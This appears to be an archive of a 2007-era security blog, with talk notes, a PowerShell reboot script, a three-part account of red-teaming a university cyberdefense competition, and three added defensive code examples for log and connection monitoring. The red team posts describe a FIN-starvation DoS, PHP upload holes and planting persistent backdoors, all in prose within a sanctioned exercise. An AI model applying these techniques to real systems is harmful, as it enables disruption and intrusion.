    A-fucking-men. First of all, he's got a point about not being professional yet. I went to school and got an MIS degree, which is, in effect, Comp Sci Lite. Did I get any information about security? Not a bit. Hell, I was barely prepared for a real technical job...I was more prepared to be a clueless analyst than technical. Bruce is absolutely fucking right that we're almost all completely self-taught, either on the job or on our own. That's not a professional workforce or industry. Not yet anyway.

    I love his mention that security is not everyone's problem. I love his mention that users don't need training, they need tools they can't fuck up. Absolutely! Likewise, if we pour a bunch of money into training, and an idiot or new user shows up and makes a mistake, all of that is wasted. We need the technological controls, and we need the secure systems, and we need the simplicity more than we need high-end training such that security can be everybody's problem. That's not to say I'm all about de-perimeterization!

    But that gets back to defense in depth. Users will make mistakes, which is also what defense in depth helps to mitigate. Yes, I think the industry has gone overboard and yes, we spend way too much money on many levels of defense, and we need to start spending that money smarter, on better defenses, and more secure foundations. More on that coming up...
    Secret #3 - Many of the security product vendors are about to be at odds with the rest of IT - The security industry has sold a lot of defense in depth; a lot of money that isn't going to securing the foundation. Bruce uses Microsoft as a case study: Microsoft tries to make a more secure foundation, but then the vendors start complaining, and Microsoft has to bend and allow unsigned driver interaction.
Excellent points. In fact, this is an issue in more than just security. Lots of money is being spent on software and systems and security, and we're starting to question, "Why?" "Why did I spend XXX on 3 years of software assurance for MS SQL Server, when no new product came out from 2000 until 2005?" I have used the example of Microsoft trying to secure its own product in the past, because it dramatically illustrates how our landscape has changed, and how the maturation of the security industry has agendas to protect. I've been saying that Microsoft can't just up and create a secure OS anymore. The vendors won't let them. They'll have to do it slowly, like boiling a lobster.

    Defense in depth may not be dead, but he has a point that we really are spending too much on it.
    Secret #4 - Full Disclosure is Dead - There is too much money to be made in selling bugs; even companies are paying for vulnerabilities. We want to make live systems more resilient to attack, but this market for vulns means those companies are (potentially) profiting at the expense of the end user.
    Again, very true, and that last sentence I don't think I had realized outright before this talk. I still believe in full and/or responsible disclosure, but at least now I have some logic behind the bad taste those "pay for my vuln" scams leave in my mouth.

    Bruce quickly closed out by re-emphasizing some of his suggestions:
    Recognize that the landscape has changed. Push vendors to make products that actually create a secure foundation, not just more layers. We need to create a more formal body of knowledge for info security, and hold each other accountable.
    This is an excellent talk, and I really love what he brings to the table. He wants to stir things up a bit, open discussions, and maybe even be wrong. But that's the sort of openness we need to keep striving for. He had a real brief mention about being open and sharing information rather than bottling it up to sell in a non-disclosure vulnerability; to not stand in line politely but to keep the energy we know we have when it comes to toeing the line. I can only imagine how a group conversation at a bar can likely last all night long about this stuff!
    .: cyber security awareness month
    For my own future reference, SANS has posted a bunch of links dealing with Cyber Security Awareness.
    .: richard clarke's five steps to save the internet
    Richard Clarke recently spoke at a conference and listed five steps to save the Internet. Here is a brief on the five steps:
    1. National biometric ID
    2. More government oversight of the Internet
    3. Nonpartisan government oversight to protect privacy
    4. Secure software standards
    5. A closed Internet for critical services like the power grid
    1- I don't like the idea of a national ID or using biometrics, but I do know that social security numbers are antiquated and broken. They're just not working anymore in our ultra-efficient information age. I agree change needs to happen; I don't know what solution I would like. Something similar to what all the cyberpunk visionaries have written about for decades is most likely inevitable. An inevitable evil. I've long felt that a major hurdle for the Internet deals with identity; trusting it and verifying it. And no, I don't think OpenID is the obvious solution.

    2- I don't like this either, and hopefully it won't happen; but I am surprised ISPs and the Net have held out this long and this well. Hopefully it stays that way.

    3- Maybe I'm old-fashioned already, but isn't privacy oversight covered by the judicial branch?

    4- This is obvious that we need better standards. Is the government the proper standards-bearer? I doubt it, and I definitely wouldn't hang my hat on getting this done enough to make an ultimate difference. It will help, as part of a blended improvement to cyber security and software security.

    5- Hrm, again, I might be old-fashioned, but I call this either a private network or a network with strong perimeters and controls. I think Clarke is looking for attention and media drama by calling it a closed Internet, but I don't think that's what he's really meaning to talk about. Why do you need a closed Internet and how is that different from a private WAN network? Open access to the web and other services? You mean like the walled garden from AOL? I'll dismiss this point because it is just bait and hype, nothing more.
    .: reboot a system in powershell
For a script I have that maintains our systems and installs new versions of our web code, I have the occasional need to also reboot a server after that install. Like most things programming, there are several ways to script a reboot.

    This first example (my preferred method) reboots a remote system.
    $objServerOS = gwmi win32_operatingsystem -computer servername
    $objServerOS.reboot()
    Leave off the "-computer servername" to reboot the local system.

    This second method is similar. The following lines will reboot the local system, force the reboot of the local system, or reboot a remote system.
    (gwmi win32_operatingsystem).Win32Shutdown(2)

    (gwmi win32_operatingsystem).Win32Shutdown(6)

    (gwmi win32_operatingsystem -ComputerName Server).Win32Shutdown(6)
    Here is a list of the codes that can be used.
    0 -Log Off
    4 -Forced Log Off
    1 -Shutdown
    5 -Forced Shutdown
    2 -Reboot
    6 -Forced Reboot
    8 -Power Off
    12 -Forced Power Off
    Pipe $objServerOS or (gwmi win32_operatingsystem) to Get-Member to see more goodies.

    There is a good chance the above commands will error when trying to do a reboot, complaining about privileges not held, even if you're running as admin. Add a privs enable line in between the above two, and it will process just fine.
    $objServer = gwmi win32_operatingsystem
    $objServer.psbase.Scope.Options.EnablePrivileges = $true
    $objServer.reboot()
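Pulling the pieces above together, here is an added helper (not from the original post) that maps the Win32Shutdown flag table to named actions, enables the shutdown privilege before the call, and checks the WMI return value rather than assuming the reboot went through. It assumes WMI/DCOM access to the target; the server name in the usage line is a placeholder.

```powershell
# Added example: reboot/shutdown a local or remote system via WMI with the
# privilege fix from the post and an explicit check of the result.
function Invoke-WmiShutdown {
    param(
        [string]$ComputerName = ".",      # "." is the local system
        [string]$Action = "Reboot",       # LogOff, Shutdown, Reboot or PowerOff
        [switch]$Force
    )

    # Base flags from the Win32Shutdown table in the post; adding 4 makes
    # the same action forced (0/4, 1/5, 2/6, 8/12)
    $codes = @{ "LogOff" = 0; "Shutdown" = 1; "Reboot" = 2; "PowerOff" = 8 }
    if (-not $codes.ContainsKey($Action)) {
        throw "Unknown action '$Action'. Use LogOff, Shutdown, Reboot or PowerOff."
    }
    $flag = $codes[$Action]
    if ($Force) { $flag += 4 }

    $os = Get-WmiObject Win32_OperatingSystem -ComputerName $ComputerName
    # Without this the call fails with a 'privilege not held' error even
    # when running as an administrator
    $os.psbase.Scope.Options.EnablePrivileges = $true

    # Win32Shutdown hands back an object whose ReturnValue is 0 on success
    # and a Win32 error code otherwise; surface that instead of swallowing it
    $result = $os.Win32Shutdown($flag)
    if ($result.ReturnValue -ne 0) {
        throw "Win32Shutdown($flag) on $ComputerName failed with code $($result.ReturnValue)"
    }
    Write-Output "$Action (flag $flag) issued to $ComputerName"
}

# Usage: forced reboot of a remote server (placeholder name) after a deploy
Invoke-WmiShutdown -ComputerName "SERVER01" -Action Reboot -Force
```

The thrown error carries the raw return code, so a deploy script can log it and stop rather than carry on as if the box had rebooted.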
    .: license to be a digital nuisance
Michael has Friday off. Michael has the day off because he will be attending Iowa State U's 3rd (?) annual CyberDefense Competition as a member of the Red Team. Michael would link to the site, but even his Google-fu is not yielding up a currently active site. This CyberDefense Competition hosts teams of college students trying to run servers and systems in a hostile environment for over 24 hours. Michael anticipates having a fun time and likely learning far more than he is able to give.
    .: lessons from a cyberdefense competition red team part 1
    This is a 3-part account of my experience on the red team for the ISU CyberDefense Competition. Part 1, Part 2, Part 3

    This weekend Iowa State University held its annual CyberDefense Competition in Ames, Iowa. The event is hosted by students and faculty from the Information Assurance Student Group and the Electrical and Computer Engineering department. In the event, teams of students attempt to deploy and manage various services representative of normal business applications. During the 20 hours the event covers, the teams are scored on their service uptimes as tracked by network monitoring (Nagios) and other neutral teams acting as normal users of the services. In addition, much like the real world, there is another team of students, faculty, and area professionals acting as attackers, intent on owning and bringing down those offered services. The services the teams were required to offer were web services (with pre-packaged web content), mail (smtp and imap), a telnet shell, ftp, wireless access for normal users, and dns to get it all working.

    The teams are made up of regular students, I believe mostly for class requirements in a couple classes. There were 15 teams ranging from what looked like 4 members up to maybe a dozen. The students have had time in advance to plan and implement their services. To illustrate the aptitude of the teams, at the start of the event only about half the teams had their services up and running. Even through the course of the night, not every team was having success getting services up, while other teams were more advanced and running ipcop, pf, iptables firewalls, and hosting services on Linux or even MS Exchange on down to SquirrelMail or IIS mail. This illustrates the widely varied skill levels in these teams. Some teams had everything choked down behind a firewall while others had disparate boxes sitting on public IPs and others were having problems with DNS configs.

    The "world" for this event is a bit interesting in itself. The teams were allowed to use publicly routable IP addresses because the event was hosted in the Iowa State ISEAGE system. ISEAGE (Internet-Scale Event and Attack Generation Environment) is a mostly closed network that simulates the Internet on a small scale to model attacks and other research activities.

At the end of the event, teams were scored and a winner announced, but more important are the lessons learned from the event itself. How difficult or easy is it to put up and manage services for a business, attend to the needed systems, and react to security events? What worked and what didn't work? Hopefully everyone went away feeling at least a bit more enlightened about the world of professional IT, no matter what their end performance in the event itself.

    On a more personal note, I certainly wish I not only had more interest in the field of networking and security when I was in college, but I also wish we had these kinds of groups. I graduated in 2001 with a degree in MIS from ISU, but I never had any security courses (and almost no security emphasis in programming or other classes) and my only networking exposure came in my last semester. I graduated having never really installed an operating system or upgraded one, nor knowing much of anything about normal business services and technology. I'm amazed where I've come since then, and I'm amazed that college studies are starting to catch up to the real world of IT and out of the academic "let's just teach everyone C and theory" practices. A competition like this where students install and work on these services is downright invaluable, even to those who didn't successfully get services running. IT is so much about doing things, not about sitting in a classroom and listening to a lecture about the theories.
    .: lessons from a cyberdefense competition red team part 2
    This is a 3-part account of my experience on the red team for the ISU CyberDefense Competition. Part 1, Part 2, Part 3

    Observations on cyber security
- Web application attacks and web site defacements are fun and tend to gather attention, from attackers and onlookers alike. Sadly, such attacks first of all don't bring services down, and so don't penalize teams all that much. Secondly, they result in little gain for the red team; a short-lived, and very public victory that results in no root access, no further gains, and most likely closed vulnerabilities.

    - Network and OS attacks seem to have gone out of style, even against systems that have their balls left hanging out into the public network space. Several ripe systems survived a long time while people tinkered with web app vulnerabilities. Beyond nmap scans, I saw very little network twiddling or system/service attacks. This may mean that over the next few years, organizational network security and hardening may atrophy as everyone focuses on the web and clients.

    - The perimeter is still a battleground, wherever it may be. One team was rumored to be running IPv6 on their inside network, which would have made things interesting for the Red Team had we ever gotten inside that network. Unfortunately, most efforts were spent pounding and poking the external surfaces and not cruising the internal networks. Note that while a web server is part of the perimeter, it has several exposed layers: application, server app, OS. And someone wants to say defense in depth is dead?

    - A majority of the time spent by red team members was exploiting holes in the web apps. There were several openings to upload files and execute PHP code on the web servers. Unfortunately, once these attacks became apparent, such holes were closed and access very limited. Some teams opted to break upload capabilities, others removed such sections from their site, and others were more correct by not allowing specific PHP executions or overwrites. Some teams left their /etc/passwd file exposed to such attacks, but all cases had shadowed passwords. More defense in depth...

    - Doing the fundamentals greatly increases survivability on the Internet. Put up a firewall and make sure your perimeter doesn't leak information or have excessive holes. Keep patches up to date on systems and services. Change default passwords and accounts. And after those are done, then pay some special attention to the users such services run under, the web applications, and the web servers. I can see why network attacks are being eclipsed by web-based attacks because the ability to secure web apps requires an amazingly huge skill set and experience/knowledge. Do you know how to securely write interactive php apps running on Apache such that they hold up to attacks? That's a job in itself for more than just one person to administer. Once the fundamentals are taken care of, it really takes a special attacker to make headway into your network. Do they have 0day exploits for your patched services, or the ability to create them? It really does take special skills to do that. I think only at the DefCon CTF competition might there be such expertise in an organized competition. If you get the fundamentals down and your web apps and servers are solid, start changing service banners to really raise the bar for attackers. The fundamentals are money in the pockets of your company.

    (A side note, that not every IT person knows the fundamentals, even today. A lot of these students went into this competition missing the fundamentals, and many more will leave the program without a firm grasp of them. LEARN THE FUNDAMENTALS!)

    - For the love of God, make an attacker's life difficult. Make the firewall not respond to closed ports. Make my nmap scan take a long time and throw everything back at me as filtered. Make me earn my scans. Make sure egress on the firewall is strictly configured so even if I do get something planted, it might not be able to call back (and will be exposed in the logs).

    - Read the fucking logs. Wow. Once a server is up and running and a service is being used, tail all the logs. The logs will reveal who the attackers are and what they are probing. Especially those web app logs! Typically once a vulnerability is found, one red team member exclaims his find and the other 14 members of the team clamor over to see it themselves. Suddenly a ton of hits on a seemingly normal part of the site may be cause for alarm. And after an incident does occur, those logs are your survival. You can put a defaced site back up, but it will just get owned again. Check the logs and close the holes, either by changing the code, removing the offending pages, or adjusting server protections to disallow certain things.

    - Similar to logs, it can be amazingly insightful to have an outside packet logger or IDS system hanging off the external interface of the perimeter. Even a DoS against the firewall can be detected and seen and diagnosed and fixed with such data. Without this data, a few teams were left wondering why their service seemed down. They looked at the service and box it was running on rather than the firewall on the network.
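    The "sudden ton of hits on a seemingly normal part of the site" from the logs point above is easy to spot mechanically. The following is an added example, not code from the original post: it parses a constructed Apache combined-format access log (the hostnames, paths and addresses are made up) and flags any path that draws a burst of hits from several distinct client addresses inside one short time window, which is exactly the pile-on pattern described.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample access log in Apache combined format; not taken from any real host.
# The cluster of hits on /gallery/upload.php from several addresses is the pattern the text describes.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Nov/2007:21:03:11 -0600] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.6 - - [10/Nov/2007:21:03:40 -0600] "GET /forum/viewtopic.php?t=3 HTTP/1.1" 200 8210 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Nov/2007:21:05:02 -0600] "GET /gallery/upload.php HTTP/1.1" 200 1220 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Nov/2007:21:05:09 -0600] "POST /gallery/upload.php HTTP/1.1" 200 310 "-" "Mozilla/5.0"
10.0.0.8 - - [10/Nov/2007:21:05:31 -0600] "GET /gallery/upload.php HTTP/1.1" 200 1220 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Nov/2007:21:06:12 -0600] "GET /gallery/upload.php HTTP/1.1" 200 1220 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Nov/2007:21:06:20 -0600] "POST /gallery/upload.php HTTP/1.1" 200 310 "-" "Mozilla/5.0"
10.0.0.11 - - [10/Nov/2007:21:07:45 -0600] "GET /gallery/upload.php HTTP/1.1" 200 1220 "-" "Mozilla/5.0"
10.0.0.11 - - [10/Nov/2007:21:07:52 -0600] "POST /gallery/upload.php HTTP/1.1" 200 310 "-" "Mozilla/5.0"
10.0.0.6 - - [10/Nov/2007:21:08:03 -0600] "GET /forum/viewtopic.php?t=5 HTTP/1.1" 200 8210 "-" "Mozilla/5.0"
"""

# client, ident, user, [timestamp], "METHOD target proto", status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return (timestamp, client ip, method, path without query string, status), or None if unparseable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    path = m.group("target").split("?", 1)[0]  # group /page.php?t=3 and /page.php?t=5 together
    return ts, m.group("ip"), m.group("method"), path, int(m.group("status"))


def find_hot_paths(log_text, window_minutes=5, min_hits=5, min_sources=3):
    """Flag paths that receive a burst of hits from several distinct clients within one time window.

    One address hammering a page may be a crawler; many different addresses converging on one
    page within a few minutes looks like one person found a hole and the rest piled on to see it.
    """
    window = window_minutes * 60
    hits = defaultdict(int)
    sources = defaultdict(set)
    first_seen = {}
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, ip, _method, path, _status = parsed
        key = (int(ts.timestamp()) // window, path)  # fixed-size time bucket per path
        hits[key] += 1
        sources[key].add(ip)
        first_seen.setdefault(key, ts)
    alerts = []
    for (bucket, path), count in sorted(hits.items()):
        if count >= min_hits and len(sources[(bucket, path)]) >= min_sources:
            start = datetime.fromtimestamp(bucket * window, tz=first_seen[(bucket, path)].tzinfo)
            alerts.append({
                "path": path,
                "window_start": start.isoformat(),
                "hits": count,
                "sources": sorted(sources[(bucket, path)]),  # who to look up in the other logs
            })
    return alerts


if __name__ == "__main__":
    for alert in find_hot_paths(SAMPLE_LOG):
        print(f"{alert['window_start']} {alert['path']}: {alert['hits']} hits from {len(alert['sources'])} clients")
```

    Tune the thresholds to the site's normal traffic; the point is that the alert names the page to go inspect and the addresses to look for elsewhere in the logs.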


    Coolest attack
    The most interesting attack I saw was actually a DoS attack. The attacker called it a reverse LaBrea attack, although it could be called tarpitting a server or a FIN starvation attack. In it, the attacker opens hundreds of valid TCP connections and then begins the teardown sequence by sending an ACK/FIN packet. The server responds with an ACK and its own ACK/FIN packet, and then waits for the final ACK response from the attacker. The attacker, however, never sends that ACK back, which keeps the server's connection open. Nicely enough, the server itself is not very busy since it is only waiting for hundreds of open connections to end. This can be eliminated in numerous ways, such as detecting DoS attacks and adjusting the firewall to block after a threshold of connections has been made, or by aborting TCP teardowns or lowering the wait time. iptables is susceptible to this unless steps are taken to correct the behavior.
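    The tell-tale sign of this attack on the server is a pile of connections from one peer parked in the teardown states, waiting on an ACK that never comes. As an added example (not from the original post), this parses constructed output in the shape of Linux `ss -tan` and counts half-closed connections per peer address, which is the threshold check the paragraph mentions before adjusting the firewall; the addresses and line layout are made up for the example.

```python
from collections import Counter

# Server-side TCP states that mean "waiting on the peer to finish tearing down".
# In the attack described above the server has sent its own FIN and sits in LAST-ACK
# waiting for the final ACK; CLOSE-WAIT is the step before that, when the peer's FIN
# has arrived but the application has not yet closed its end.
TEARDOWN_STATES = {"LAST-ACK", "CLOSE-WAIT", "FIN-WAIT-1", "FIN-WAIT-2"}

# Constructed sample in the shape of `ss -tan` output; not captured from a real host.
SAMPLE_SS = """\
State      Recv-Q Send-Q Local Address:Port   Peer Address:Port
ESTAB      0      0      192.0.2.10:80        203.0.113.5:51000
LAST-ACK   0      1      192.0.2.10:80        198.51.100.7:40001
LAST-ACK   0      1      192.0.2.10:80        198.51.100.7:40002
LAST-ACK   0      1      192.0.2.10:80        198.51.100.7:40003
LAST-ACK   0      1      192.0.2.10:80        198.51.100.7:40004
LAST-ACK   0      1      192.0.2.10:80        198.51.100.7:40005
CLOSE-WAIT 1      0      192.0.2.10:80        198.51.100.7:40006
TIME-WAIT  0      0      192.0.2.10:80        203.0.113.9:50222
LAST-ACK   0      1      192.0.2.10:80        203.0.113.9:50223
ESTAB      0      0      192.0.2.10:22        203.0.113.5:51234
"""


def peer_ip(endpoint):
    """Strip the port from an address:port string; also handles bracketed IPv6 such as [2001:db8::1]:443."""
    host, _sep, _port = endpoint.rpartition(":")
    return host.strip("[]")


def count_stuck_teardowns(ss_output):
    """Count, per peer address, the connections parked in a teardown state."""
    stuck = Counter()
    for line in ss_output.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 5:
            continue
        state, peer = fields[0], fields[4]
        if state in TEARDOWN_STATES:
            stuck[peer_ip(peer)] += 1
    return stuck


def flag_peers(ss_output, threshold=5):
    """Return {peer_ip: count} for peers holding at least `threshold` half-closed connections.

    A handful of stuck teardowns per peer is normal; dozens or hundreds from one address is
    the tarpit. The result is the list you would hand to a firewall block or connection-limit rule.
    """
    return {ip: n for ip, n in count_stuck_teardowns(ss_output).items() if n >= threshold}


if __name__ == "__main__":
    for ip, n in flag_peers(SAMPLE_SS).items():
        print(f"{ip} is holding {n} connections in teardown")
```

    TIME-WAIT is deliberately left out of the count: that state belongs to a close the server itself finished, so it is not something a peer can hold open against you.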


    Some false lessons
    While lots of lessons and insight can be learned, there are some red herrings and false lessons that hopefully no one takes away.

    - Applications are not always secure. Almost every team was running fairly new versions of their applications and systems, from new phpBB and SquirrelMail implementations to new Ubuntu boxes. While it might seem impregnable today, will it be impregnable in a year in a company with poor patch management? Nope. Those little applications like a wiki or phpBB can quickly draw cold sweat on the necks of IT admins...

    - While the red team had a lot of talent in one room, I still wouldn't consider any of them black hat hackers by any means. Most were still students, and only a handful were security professionals. The skillsets only go so far, but the real world can throw any level of skills at you.

    - Attacks can still come from within. Pretty much out of scope was social engineering on any scale that would allow unsupervised physical access to systems. Also, attacks on clients such as emailed trojans were not really possible. There really weren't that many systems on the inside to dupe and gain a foothold. This was more like attacking a standalone DMZ. But don't forget every system and user is a target.

    - DoS attacks are still debilitating and not only can end your night quickly in a competition, but can close a business just as quickly in the real world. And for as debilitating as a DoS attack is, it is typically the least planned-for and one of the harder attacks to thwart, in theory. (Ok, DDoS is harder, just to pre-empt commenters saying it is easy!)


    Personal lessons
    I'm out of practice. A competition is not the place to fire up Metasploit 3 for the first time (although thankfully I have used Metasploit 2 in the past). Likewise, know general tools to use for basic stuff, and practice them. Domain transfers, nmap scanning, OS/service fingerprinting (both from a scanner but also from just using the services, like Apache running on Ubuntu). I'm rusty on almost everything, so practicing is definitely in order. It's just one of those things I don't get to do on a daily basis on the job (or even weekly or monthly!). Know BackTrack tools inside and out. Be familiar with wireless attacks both as an associated client (airpwn, hamster/ferret, rogue AP, MITM) and as an outside attacker (DoS, WEP cracking, IV generation). Knowing these things well up front goes a long way to being an efficient attacker. Just like the defenders, attackers need to know the fundamentals, and practice them regularly. This can lead to less time spent relearning tools or settings, and more time being surgical and more creative. It can also mean less jubilation at low-level triumphs; rather thinking how to leverage those hidden lower triumphs to get the most gain over the long run.
    .: lessons from a cyberdefense competition red team part 3
    This is a 3-part account of my experience on the red team for the ISU CyberDefense Competition. Part 1, Part 2, Part 3

    This section is just to document some of my feelings on organizing a red team. Overall, I don't know if there are wrong ways to organize a team, but here are just some ideas and thoughts.

    1. Do a brief round of introductions and specialties and background; newbies are welcomed to say they're newbies. This gets everyone's name out there, breaks the ice for the shy ones, and helps everyone know who to ask for specific expertise. This can also let everyone know who the person in charge is, i.e. whom you ask for direction or information if needed, such as where to set up and how to connect. This person will need to repeat much of this for any latecomers.

    2. Assign people tasks, rather than targets. App specialists tend to skip obvious network holes and can get distracted by app holes in various teams. It is best to keep people doing what they'd rather be doing, and giving all teams a more equalized enemy. Newbies can get pretty good with scanning as they go, but a newbie assigned a team may give that team far less successful attacks with which to evaluate their defenses.

    3. Make root the goal. Sure, DoS and service interruptions from a Nessus scan, and web defacements are fun, but really make root and total ownage the end goal. Create persistent backdoors and get inside. Even a team that thinks it was up most of the event may have been completely owned and leaking valuable information to outsiders.

    4. I would consider DoS a valid attack in a competition where uptime is a scoring criterion, but only insofar as configuration errors make the DoS attacks possible. In other words, preventable from a practical standpoint. Nonetheless, DoS shouldn't be used constantly, and only to illustrate the vulnerability and drive home the point with some downtime and points loss. After the point is made, ease up and let the teams and attackers get more out of the experience. (Imagine your team is being DoSed and you don't really know how to fix it...and it lasts the whole competition...that sucks pretty hard for just not knowing maybe the one config change to fix it.)

    5. Don't overlook the obvious deficiencies. They may not lead to root, but noting things like a lack of SSL on logins or an MS Exchange server hanging out in the winds of the public net can be important notes to make when evaluating team performances. They'd be dings on professional evaluations, so may as well ding them here as well.
    .: spi dynamics web app hacking workshop
    This morning I attended a workshop hosted by Michael Sutton of SPI Dynamics. Michael is the Security Evangelist (kinda like a mix between a trainer and a sales engineer, I think...does that not sound like a cushy role?) for SPI Dynamics, and he talked about hacking web applications. I just need to mention that the blogs and labs on the SPI Dynamics site are both nice resources. The talk had about 35-40 people in attendance, about 1/3 QA, 1/3 developers, and 1/3 security people, with a couple managers and a couple of us sysadmins in attendance.

    Michael opened up by talking about why web application security is important now, and then delved into describing and demoing 4 different attacks against web apps: XSS, SQL Injection, CSRF, and Ajax attacks. While this isn't new to me, personally, I don't think I've seen live demos of these attacks before, so that was a step up for me (come on, we don't get this kind of thing in Iowa every month!). He talked about reflected and persistent XSS issues, with a demonstration of persistent XSS. Then both verbose and blind SQL injections. After a break we saw CSRF and Ajax demonstrations.

    I do want to mention the tools used or mentioned. Oh wait, gosh, almost everything is done using just a browser. Of course, this means almost anyone can start picking this up and learning how to find these holes (increased risk!). Michael did mention Absinthe as a blind SQL injection automater, Live HTTP Headers (Firefox addon), FireBug (Firefox addon), and SPI Proxy (part of the commercial product WebInspect). The latter was used to intercept and change browser-server requests in Ajax pages, very cool!

    He then closed out with brief looks at SPI commercial tools WebInspect and DevInspect, which really both look nice for dev and security teams to automate and standardize their testing. My only brief nitpick on the presentation was the use of AJAX as an acronym in the slides, but he did mention that it is no longer really intended as an acronym anymore, and has been used to simply describe new web behaviors. Kudos for hating on "Web 2.0" as a term, since I hate it as well.

    Nitpick aside, the workshop was well done, a decent way to spend a morning away from work, and provided good information. I'd recommend it for anyone who isn't already a web application security guru who knows those attacks and tools inside and out. And no, it had no marketing spiel or slant to it.
    .: randomness: passwords, ids, salespeople, defaults, layers
    I think every time I call one of my credit card customer service centers, I have the same befuddled response, probably because I only call once every 6 months, if that. "Can I have your password for this account?" Me: "...huh, what? I didn't know there was a password.." Rep: "It is probably your mother's maiden name." Me: "...oh...ok well let's try this." And of course it works...it's just so odd being asked a password on the phone...

    I really don't like having a gap between my use of an IDS/IPS and knowledge of the signatures. Today a new alert came across proclaiming "NETBIOS-SS: Bugbear Virus Worm." I'm not sure what a "virus worm" is, but it certainly is something to look at right away. Turns out it was a false positive, but I really wish I could see what my vendor's signatures actually are, rather than seeing the interpretation of them in the management console (which are almost always inconclusive and vague). Oh, since I'm complaining about the IDS/IPS, I'll echo my old complaint that I really dislike capturing only one packet per alert, even though I have it set to log the stream...one packet certainly gives me a lot of context!

    Annoying vendor salespeople #84: Insist on digital communication via email only. Actively reject any attempts at face-to-face or voice-to-voice communication. I think sales people have a handbook that says sales are guaranteed with face-to-face meetings and 80% guaranteed with voice-to-voice meetings. It's almost like seeing a squirrel stuck inside a gallon milk jug.

    What if we start convincing companies to roll out "secure by default" devices and software? Will we dumb down our workforce too much, with people who know how to roll something out but not know how to manage anything? IIS is easy to build now, but takes work to really understand it. Apache still scares IIS users because you need to make config changes early on... Just a thought, although I do believe "secure by default" should be the goal.

    I was adjusting a script of mine the other day to account for the event of a configuration error in some file replication apps we run. A config error led to an issue with script execution, so I coded around it before I found the config error. This is effectively a little bit of "defense in depth" although this has nothing to do with security. But what if a config error occurs again? Because I've layered my script over the config, it might mask the problem with the config. Can defense in depth mask holes in the various layers because testing isn't done on each piece? Possibly...
    .: patch tuesday information sources
    For some time now, the ISC has been my first check for information on Microsoft patches from Patch Tuesday. I then follow links to the disclosures on Microsoft's site and the CVEs for more details.

    I see BreakingPoint has gone further and released a slew of in-depth looks at the patches and the vulnerabilities those patches, err, patch. I think this is awesome, and fits what is kind of the last piece to getting all the info about Patch Tuesday: overview, official statements, technical analysis. I hope they do this every month.
    .: ode to the ciso
    Cutaway posits, "Why is it that we have not seen college, high school, or any other school close their doors because of security breaches or just plain being totally owned?"

    I'm not going to answer that, but I will say that this is my new ode to ousted CISO/CIOs who lose their positions due to a stupid security breach:
    laugh and the world laughs with you,
    weep and you weep alone,
    for the sad old company must keep hold its money
    but still has security troubles on its own
    This is adapted from a wonderful poem by Ella Wheeler Wilcox called Solitude. (If you like that poem, I highly suggest browsing her other works...)
    .: auditing guides from the iia
    The IIA has a series of audit related guides available. I very briefly skimmed a couple of them to check out the content, and they look really informative. They seem to be about 50 pages long, which is right about my personal limits to what I print at work for personal pleasure. Therefore, logging the links for my own use.

    1 Information Technology Controls
    2 Change and Patch Management
    3 Continuous Auditing
    4 Management of IT Auditing
    5 Managing and Auditing Privacy Risks
    6 Managing and Auditing IT Vulnerabilities
    7 Information Technology Outsourcing
    8 Auditing Application Controls

    Saw this from the Security4All blog. (Ok, fine, I printed guides 2 and 6...)
    .: cube culture at linkedin
    I wish my cube could look like these in the LinkedIn offices. Wow! Now, that is what work really should be like. Although some of the cubes look a little *too* themed and over-the-top, at least they are having fun and seem to encourage employees to be expressive. I really think that can only be a good thing. In my current job, the company has very strict rules about cubes (nothing above the sides, nothing hung outside the small tack boards, no white boards, no plants, no fish, tidy, no real decor...blah blah blah...basically a sterile hospital room), which makes for a very non-homey feel. Meh.

    I dig the half-completed ceiling. It adds some depth, prevents the sterile-stifling-ceiling effect, makes things interesting, and likely gives it more air as well. Kinda combining the best effects of a factory facility with an office one. There's a Superman in the pics that is a little too hung for comfort. Still, it would be fun to come to work in an environment like this. Many people, especially us techies, really do like our professions when given the chance; work is not work for us like it might seem for more blue-collar type jobs or more menial labor. It really is a boon when the company completes that happiness circle by letting employees be happy employees.

    I'm surprised I didn't see any cubes decorated with a variety of logic puzzles, plush toys, and various other little trinkets to play with from ThinkGeek. Geek out while stoking the fires of creativity... I'm also surprised more weren't covered like the camp-themed one. I think it would be a bit popular to shut out the fluorescent lighting and opt for something more cozy in a covered setting. I would take softer, less direct lighting any day over typical sterile office ceiling fluorescents. More beanbags in corners for ad-hoc meetings, more comfy chairs for collaboration visits... :)
    .: more security games
    Deborah Hale reported over at the ISC Handler's Diary about taking part in a SANS conference which culminated in a red team/blue team event between teams of attendees and helpers. I really think continued exercises like this are some of the most valuable things we can do in security.
    .: a series of unfortunate events
    Have you seen recent HP promotions about how the computer is personal again? Well, check it out. We received a box from HP today with that same font on the side, which a few of us recognize from the movie and book, Lemony Snicket's A Series of Unfortunate Events. We found it very humorous that a computer box would want to be associated with a series of unfortunate events, and it made for a very laughter-inducing morning!
    .: yaeauef: yet another example against user education fanaticism
    Outside the business parking lot where I work there are 4-lane, fairly busy roads. On two of the drives out onto this street are very visible signs prohibiting left turns (i.e. across 3 of the 4 lanes, at a minimum). This is basically a sort of rule. However, there are, every day, people who disobey that sign and make the dangerous, inconsiderate turn left across all lanes, inconveniencing people behind them, drivers on the roads, and setting themselves up for an accident that likely will be billed directly as their fault considering the disregard. Likewise, almost everyone "obeys" speed limit laws by only going, at most, 10mph over the speed limit.

    And we expect these same people to obey corporate IT policies? I guess my point is that user education helps those who care, but will do nothing to improve the security practiced by those people who are poor risk evaluators or just plain don't care. They will take the shortcuts or bend the rules as they see fit. This is why I fall more on the side of technological controls than on user education when it comes to a solid security plan. I want both, but I can never truly rely on all the people...

